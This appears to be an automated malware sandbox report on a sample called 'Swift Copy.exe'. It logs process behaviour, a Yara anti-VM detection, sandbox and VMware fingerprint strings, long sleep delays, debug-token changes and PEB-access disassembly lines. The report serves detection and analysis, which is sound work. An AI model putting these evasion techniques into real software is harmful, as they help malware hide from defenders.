Source: C:\Users\user\Desktop\Swift Copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: 00000000.00000002.286746529.0000000002670000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.284828644.0000000002420000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Swift Copy.exe PID: 1740, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: Swift Copy.exe, 00000000.00000002.286746529.0000000002670000.00000004.00000800.00020000.00000000.sdmp, Swift Copy.exe, 00000000.00000002.284828644.0000000002420000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL
Source: Swift Copy.exe, 00000000.00000002.286746529.0000000002670000.00000004.00000800.00020000.00000000.sdmp, Swift Copy.exe, 00000000.00000002.284828644.0000000002420000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME

Source: C:\Users\user\Desktop\Swift Copy.exe TID: 1816	Thread sleep time: -45877s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe TID: 1748	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2508	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 8_2_018F6B90 rdtsc

8_2_018F6B90

Source: C:\Users\user\Desktop\Swift Copy.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Window / User API: threadDelayed 9125

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

API coverage: 4.6 %

Source: C:\Users\user\Desktop\Swift Copy.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Swift Copy.exe	Thread delayed: delay time: 45877	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: explorer.exe, 0000000B.00000000.341791514.00000000080ED000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 0000000B.00000000.342989773.0000000008223000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}*^d
Source: explorer.exe, 0000000B.00000000.320221705.0000000004287000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: 00000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA
Source: Swift Copy.exe, 00000000.00000002.284828644.0000000002420000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 0000000B.00000000.380692577.0000000000680000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _VMware_SATA_CD00#5&280b647&
Source: explorer.exe, 0000000B.00000000.334568953.000000000069D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: Swift Copy.exe, 00000000.00000002.284828644.0000000002420000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware
Source: explorer.exe, 0000000B.00000000.342989773.0000000008223000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: explorer.exe, 0000000B.00000000.342989773.0000000008223000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}t]
Source: explorer.exe, 0000000B.00000000.300110801.00000000062C4000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000B.00000000.342989773.0000000008223000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}+]e
Source: explorer.exe, 0000000B.00000000.320221705.0000000004287000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0
Source: explorer.exe, 0000000B.00000000.327235591.000000000820E000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: Swift Copy.exe, 00000000.00000002.284828644.0000000002420000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware SVGA II
Source: explorer.exe, 0000000B.00000000.341791514.00000000080ED000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 0000000B.00000000.342989773.0000000008223000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00l
Source: Swift Copy.exe, 00000000.00000002.284828644.0000000002420000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 8_2_018F6B90 rdtsc

8_2_018F6B90

Source: C:\Users\user\Desktop\Swift Copy.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018FA185 mov eax, dword ptr fs:[00000030h]	8_2_018FA185
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018EC182 mov eax, dword ptr fs:[00000030h]	8_2_018EC182
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018F2990 mov eax, dword ptr fs:[00000030h]	8_2_018F2990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_019451BE mov eax, dword ptr fs:[00000030h]	8_2_019451BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_019451BE mov eax, dword ptr fs:[00000030h]	8_2_019451BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_019451BE mov eax, dword ptr fs:[00000030h]	8_2_019451BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_019451BE mov eax, dword ptr fs:[00000030h]	8_2_019451BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018F61A0 mov eax, dword ptr fs:[00000030h]	8_2_018F61A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018F61A0 mov eax, dword ptr fs:[00000030h]	8_2_018F61A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018E99BF mov ecx, dword ptr fs:[00000030h]	8_2_018E99BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018E99BF mov ecx, dword ptr fs:[00000030h]	8_2_018E99BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018E99BF mov eax, dword ptr fs:[00000030h]	8_2_018E99BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018E99BF mov ecx, dword ptr fs:[00000030h]	8_2_018E99BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018E99BF mov ecx, dword ptr fs:[00000030h]	8_2_018E99BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018E99BF mov eax, dword ptr fs:[00000030h]	8_2_018E99BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018E99BF mov ecx, dword ptr fs:[00000030h]	8_2_018E99BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018E99BF mov ecx, dword ptr fs:[00000030h]	8_2_018E99BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018E99BF mov eax, dword ptr fs:[00000030h]	8_2_018E99BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018E99BF mov ecx, dword ptr fs:[00000030h]	8_2_018E99BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018E99BF mov ecx, dword ptr fs:[00000030h]	8_2_018E99BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018E99BF mov eax, dword ptr fs:[00000030h]	8_2_018E99BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_019469A6 mov eax, dword ptr fs:[00000030h]	8_2_019469A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_019849A4 mov eax, dword ptr fs:[00000030h]	8_2_019849A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_019849A4 mov eax, dword ptr fs:[00000030h]	8_2_019849A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_019849A4 mov eax, dword ptr fs:[00000030h]	8_2_019849A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_019849A4 mov eax, dword ptr fs:[00000030h]	8_2_019849A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018CB1E1 mov eax, dword ptr fs:[00000030h]	8_2_018CB1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018CB1E1 mov eax, dword ptr fs:[00000030h]	8_2_018CB1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018CB1E1 mov eax, dword ptr fs:[00000030h]	8_2_018CB1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_019541E8 mov eax, dword ptr fs:[00000030h]	8_2_019541E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018C9100 mov eax, dword ptr fs:[00000030h]	8_2_018C9100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018C9100 mov eax, dword ptr fs:[00000030h]	8_2_018C9100
